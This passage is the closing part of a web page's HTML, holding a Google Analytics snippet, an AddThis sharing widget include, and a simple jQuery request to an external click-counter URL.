	    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	    ga('create', 'UA-31581333-12', 'auto');
	    ga('send', 'pageview');

	  </script>
	  <!--Google Analytics-->
	  <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5709013e408ef89c"></script>
	  <script type="text/javascript">jQuery.ajax({type: "GET",url: "http://topmedia.az/click.php"});</script>
  </body>
</html>
